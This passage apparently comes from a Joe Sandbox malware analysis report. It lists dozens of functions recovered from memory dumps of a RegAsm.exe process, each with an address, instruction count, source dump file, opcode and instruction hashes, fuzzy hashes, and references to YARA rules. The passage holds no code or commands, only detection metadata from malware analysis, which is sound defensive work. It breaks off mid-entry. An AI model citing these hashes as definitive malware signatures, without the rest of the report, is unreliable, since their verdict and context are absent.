                                                                                                                                                                                  • Opcode Fuzzy Hash: e3e40a47977e7423861ed6689f66216ea1e82dfbb114402a7fbdb7031019cbad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 66E0ED721041987F9F428E94DC51CFA7FBAEF8D264B08814AFD9492251C676DD32EFA0
                                                                                                                                                                                  Function 02CBCFE8 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: aec0a68ba5e37043b5b247aa493f02135377b52cb017309bfb809df6ca3591ce
                                                                                                                                                                                  • Instruction ID: abfe89bb2082c2e6ec70cdc112e48945558ac5b6a6c0b7184849175eb272b734
                                                                                                                                                                                  • Opcode Fuzzy Hash: aec0a68ba5e37043b5b247aa493f02135377b52cb017309bfb809df6ca3591ce
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AE01A72100009BBCF019E84DC02EEA7B6AFB58310F04811AFD1496211C676D932AB90
                                                                                                                                                                                  Function 02CBF290 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 664f35d6e9b6a0b8d0af0c68ad880da06b61d7390ef2d4ad81f92f49d285d556
                                                                                                                                                                                  • Instruction ID: ab42ce4db648e4beb32346b8b6c2f302b8672c3b12da0919521848ec76e6fc6f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 664f35d6e9b6a0b8d0af0c68ad880da06b61d7390ef2d4ad81f92f49d285d556
                                                                                                                                                                                  • Instruction Fuzzy Hash: 83E04F721040A87F8B41CE99CC10DFB7FED9A4D111B08804BFDA4C2242C57AD922EBB0
                                                                                                                                                                                  Function 02CBEFA8 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cb173aa4a1b28b2cd414003632927c6eed1b8820e9e9564883bc28b9f27116b7
                                                                                                                                                                                  • Instruction ID: a02a2cd37861e6868ce42adca1476708775c64693d4ca00663a8e40be836100f
                                                                                                                                                                                  • Opcode Fuzzy Hash: cb173aa4a1b28b2cd414003632927c6eed1b8820e9e9564883bc28b9f27116b7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24E086731041583FC710D989CC51BB77BEC8B4D150F08C05AFD95C2282D569EE0297B0
                                                                                                                                                                                  Function 05325FB8 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5e15507fc50ee948970dbd4762f3ff8614c5cf8d10decee01242b114e01db4c8
                                                                                                                                                                                  • Instruction ID: 5dd3c1d11ce0abbd0a6421927aafbfe96e00f8e474ef36b1fa3fb3cc611671f7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e15507fc50ee948970dbd4762f3ff8614c5cf8d10decee01242b114e01db4c8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 03E05236110114BF8B469FC4D944C91BFAAFF8D22030AC09AF6188B232C673D922EB90
                                                                                                                                                                                  Function 0101A418 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 10d60a4619f3c7f1aa1159ce6855a8f050cb07a3285e5185407adeedbd6fec6d
                                                                                                                                                                                  • Instruction ID: d119774642f23f8ef16b2f6a71f7d6127a167d18d157cc2496fb5718d9e87d3c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 10d60a4619f3c7f1aa1159ce6855a8f050cb07a3285e5185407adeedbd6fec6d
                                                                                                                                                                                  • Instruction Fuzzy Hash: EBE0EC765001197BDB00CE88DC41EA67B6EEB88260F04C55ABD1997351D6B7ED229BA0
                                                                                                                                                                                  Function 010134D0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 37bb43a95ba4639d060b9254fa0e88c2e6b9feb484905d03ada16bc63043912f
                                                                                                                                                                                  • Instruction ID: 677036de53a6c6bc11064f7cc204ba92256bd54b580c2175e59626006c2b9ef7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 37bb43a95ba4639d060b9254fa0e88c2e6b9feb484905d03ada16bc63043912f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 05D0127245110CAFC700DE94DD817DABBFDDF55660F6005A6DC04D7210E93A9E1567A1
                                                                                                                                                                                  Function 0101AC08 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5398c50ff250a001131fc21625f7f04a56a2f53cd269d65537440e1ef9320d76
                                                                                                                                                                                  • Instruction ID: e7e7aa7da6517886cc490ba720dc7d7223a8b5fd021cf43f2e39487c7f577c5f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5398c50ff250a001131fc21625f7f04a56a2f53cd269d65537440e1ef9320d76
                                                                                                                                                                                  • Instruction Fuzzy Hash: 56E04F32104144AFCB028F84DD41DA67B79EF85360709C09BFC588A262D6B2DD21D771
                                                                                                                                                                                  Function 01012FFF Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f799511eeb21dd98db77a8b378c81c1f3452f49d22aa1a66e07b5c327beff745
                                                                                                                                                                                  • Instruction ID: 694d5aaeef90e9f459b9969cf61e292501ff8d9a78d3ad5f764d2846d5097cf6
                                                                                                                                                                                  • Opcode Fuzzy Hash: f799511eeb21dd98db77a8b378c81c1f3452f49d22aa1a66e07b5c327beff745
                                                                                                                                                                                  • Instruction Fuzzy Hash: FAF0E579A04118CFDB04CF94D885B9DFBB2FB84324F1080A6E249AB219D738A981CF11
                                                                                                                                                                                  Function 01018E40 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 090bafd5c5a98d9f660daa058c2ec230754ec3b243ba57e777075399d87dbe00
                                                                                                                                                                                  • Instruction ID: d0b58847eb8460af2b5d67f16e5a0820dccd1d4810ebf0fdead9d4ba40bc9ac8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 090bafd5c5a98d9f660daa058c2ec230754ec3b243ba57e777075399d87dbe00
                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF0E531A041489FD700EB70E915A9E7FB1EF85300F4045E9D8499B2D9DAB42E04CB41
                                                                                                                                                                                  Function 05343588 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: acfac41bf99781799f4d76d1deb5a81fcacb8c3fa4a4c010bb88e5d5b7f7809e
                                                                                                                                                                                  • Instruction ID: 5135a2cbf27a1c002a907897d1d7f46551d2733154246544477de77ffb17384a
                                                                                                                                                                                  • Opcode Fuzzy Hash: acfac41bf99781799f4d76d1deb5a81fcacb8c3fa4a4c010bb88e5d5b7f7809e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 12E086311042587BC741DF98E800EA67F69EB85260F04C05AFC5486243CB72DD22D7A0
                                                                                                                                                                                  Function 0101A3A8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d6776b5dae521477eb7edab784be785b94c1abc75430774d062248ea7c6ee8f0
                                                                                                                                                                                  • Instruction ID: 548f49a5403f81756ae45ba61096202869016541b8319ba4f515dbcb0f9a78a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: d6776b5dae521477eb7edab784be785b94c1abc75430774d062248ea7c6ee8f0
                                                                                                                                                                                  • Instruction Fuzzy Hash: A9D01233310124B7DB05698DEC05EEB7B5EEBD8761F048066F605C7244CE759D5197E0
                                                                                                                                                                                  Function 01011E00 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 68bd9f11df7d97fddd0643bd7b973a5a873d6db8673557cdcbcf59185744f7a3
                                                                                                                                                                                  • Instruction ID: 841ad68bb29f3fda566233d57409cfed7ae89ae07f786880f9b6aad418aec838
                                                                                                                                                                                  • Opcode Fuzzy Hash: 68bd9f11df7d97fddd0643bd7b973a5a873d6db8673557cdcbcf59185744f7a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: BFE0173125B6D04FC703A778E826C893FA49E8756834A44E3F485CF673DA259C47DBA2
                                                                                                                                                                                  Function 01018E50 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 55273bc6e239b23e42e0d4c825723a594840327d242fad450ffc97427114a457
                                                                                                                                                                                  • Instruction ID: 007a46a89a9d285a9b92168fd937017dcf228d25e62013a6a9f621581f065a8d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 55273bc6e239b23e42e0d4c825723a594840327d242fad450ffc97427114a457
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EE04F35A4110CEFC704FFA5E951A9DB7B5FF88310F904668E90A9B388DE756E41DB80
                                                                                                                                                                                  Function 0101CEB0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 23dac8301a061ade4a0d814d1d650906dffb6bfbe2ceb72cc647496a3b716a1c
                                                                                                                                                                                  • Instruction ID: 2d2788d9aeabf9eef0920cfc3e477fa40a1d60a11e44dac842cdc20018469fb7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 23dac8301a061ade4a0d814d1d650906dffb6bfbe2ceb72cc647496a3b716a1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: DAE0C2704491889FC702DFF499210E97FF6DF4B20032046D6C484D7131D5358E139741
                                                                                                                                                                                  Function 053260D0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 06351058137161aa439d3768f56f3767d035d469b9f81aafff42935dcb596a11
                                                                                                                                                                                  • Instruction ID: b4df2074a755a797748f24ecc8dfc1f816945a20b2bc5684a51b9c1da5bff4f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06351058137161aa439d3768f56f3767d035d469b9f81aafff42935dcb596a11
                                                                                                                                                                                  • Instruction Fuzzy Hash: BAE08C326145218FC301EA18DC91F9AB3A8EF85A04F04C57EE885E7245EA70D84686E1
                                                                                                                                                                                  Function 053359A8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e51695d819247498cb616b0937606ac09927961350b3aeda2ac7c0e2c8c1fffd
                                                                                                                                                                                  • Instruction ID: 104d21cb8de960a4127141d8341e8358d65e272336baf066561469d9a6686db4
                                                                                                                                                                                  • Opcode Fuzzy Hash: e51695d819247498cb616b0937606ac09927961350b3aeda2ac7c0e2c8c1fffd
                                                                                                                                                                                  • Instruction Fuzzy Hash: D4D02E2930A29033C30462BF7C446979EACEFCAAB8B81103EF80DC7203CD005C028760
                                                                                                                                                                                  Function 02CB4B30 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6a92fa1fcaac9de8804f121636bed7a8ac7b72f4eefd3adc2ca70c95f0ec9ea2
                                                                                                                                                                                  • Instruction ID: eb3e3d8b10bce922574a09182793b0f11c9374ebf4d6721c34c1cf1defece3e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a92fa1fcaac9de8804f121636bed7a8ac7b72f4eefd3adc2ca70c95f0ec9ea2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DE0EC7120D2D05FC347DB7898A28A5BFF2AF86504708CCDEE4C14B252C625DC1BC751
                                                                                                                                                                                  Function 0101B7A1 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a2a4fba0161210315f42b070c8a1f81ae45fd3ffca800c7f84bde70791c99161
                                                                                                                                                                                  • Instruction ID: 36fdb85338bd91ed75e7afeecc777b81a5efafb439f83f381830a4424e8c32b1
                                                                                                                                                                                  • Opcode Fuzzy Hash: a2a4fba0161210315f42b070c8a1f81ae45fd3ffca800c7f84bde70791c99161
                                                                                                                                                                                  • Instruction Fuzzy Hash: B5E012721001587F9704DE88DC51CB77B6DDB89220704C056FD54C7241C6B2ED2297B0
                                                                                                                                                                                  Function 01014620 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b4c8e295fa06be991d20ba0e07a9dbfca0d40811ac8d0438b429882bcc0ab479
                                                                                                                                                                                  • Instruction ID: f88a30084b989a2778574616fd1acdbd738242fda653fc661066e9a10116352b
                                                                                                                                                                                  • Opcode Fuzzy Hash: b4c8e295fa06be991d20ba0e07a9dbfca0d40811ac8d0438b429882bcc0ab479
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AE04F31A51108EFC704FF69E94199DB7B5FF88210B400668D5099B298DF352E40DB80
                                                                                                                                                                                  Function 05329AB2 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c2deca47a1d84e7c78012dd27a3e4c9d0bafb6cd7bb9ae08980f9be3f8108447
                                                                                                                                                                                  • Instruction ID: 9538618c3717b65192f3a9d37969ab382c37f24e5179dab8a25bdcc965cb7bf9
                                                                                                                                                                                  • Opcode Fuzzy Hash: c2deca47a1d84e7c78012dd27a3e4c9d0bafb6cd7bb9ae08980f9be3f8108447
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24E0EC721041587F8B41CE89DC51DB67BADDF89260708805ABE54C6251C672DD229BB0
                                                                                                                                                                                  Function 05337359 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 71444310ab4e4703b823130b9e18b3d364ddd727440ece5ec127206f08cd2b4c
                                                                                                                                                                                  • Instruction ID: b3ad2eb961b6bc6da6d6d0baf07247a969790bc2c4a78f9f5505739a203d5d60
                                                                                                                                                                                  • Opcode Fuzzy Hash: 71444310ab4e4703b823130b9e18b3d364ddd727440ece5ec127206f08cd2b4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7E086B25042586FCB01CE94CC419A67FADEB45210B05844BFC4597292C7B2EC12DBA0
                                                                                                                                                                                  Function 02CB4FD8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 34c0d1e9904cbc1009ee691bfcd4e7f69e68f7b0965ab49ac54d9b7c90bdd8eb
                                                                                                                                                                                  • Instruction ID: 2912f9d2e88031a82de27a84517b75078679e637402c0fa6d1fc150396d09fbf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 34c0d1e9904cbc1009ee691bfcd4e7f69e68f7b0965ab49ac54d9b7c90bdd8eb
                                                                                                                                                                                  • Instruction Fuzzy Hash: E1E012751081819FC342CB54E9919A6BFF2DFCA614B04C889E48147222C636DC17D722
                                                                                                                                                                                  Function 0101C182 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 33bf0fdfbfae03769aafec44f0336c06756763a26f13a5f795bf26a9593a9ac4
                                                                                                                                                                                  • Instruction ID: d94c3fbfbb567e6c0dd96c847ca10263cb6657a405a7acb0293360aa1d963b6c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 33bf0fdfbfae03769aafec44f0336c06756763a26f13a5f795bf26a9593a9ac4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 44E012B61081D05EC252CA69D9A1EA6FBE98B8D510F09889DF8C482652C51DDD07C732
                                                                                                                                                                                  Function 010123C9 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4c75c42b39d8a0f49b23858eca4c0427b064e63a1aae5645b24005a974259143
                                                                                                                                                                                  • Instruction ID: 230f72942e8168719d6ca9526d4ca1e868d65c287336ae712a2f247964292d24
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c75c42b39d8a0f49b23858eca4c0427b064e63a1aae5645b24005a974259143
                                                                                                                                                                                  • Instruction Fuzzy Hash: C3E0C23285120CBFCB00CFA4D902B9ABBB8DF04210F0044E5EC04D3211ED358E08A792
                                                                                                                                                                                  Function 0532B1B7 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dd4df1c7768d76758aea5f51c87ab497cbf1b246c5753c0fc3e3813ba799f60c
                                                                                                                                                                                  • Instruction ID: aca12edd2c908f587b0ca7014a6a8b1897b1a930429083fe0be4e62dd912d829
                                                                                                                                                                                  • Opcode Fuzzy Hash: dd4df1c7768d76758aea5f51c87ab497cbf1b246c5753c0fc3e3813ba799f60c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 30D0173284110CEF8B11EFD0E5404EDBBB5EF86200B6002EAD9086B230EE324B24AB81
                                                                                                                                                                                  Function 05329AB8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 49bec1adbdd607e6d40542e0f5ee0b269763f6f04078961a161352a179076708
                                                                                                                                                                                  • Instruction ID: b7c15f5d6199f36f7ff641d71568f529fc96a3582e1d2df4f696ef0e7959edf5
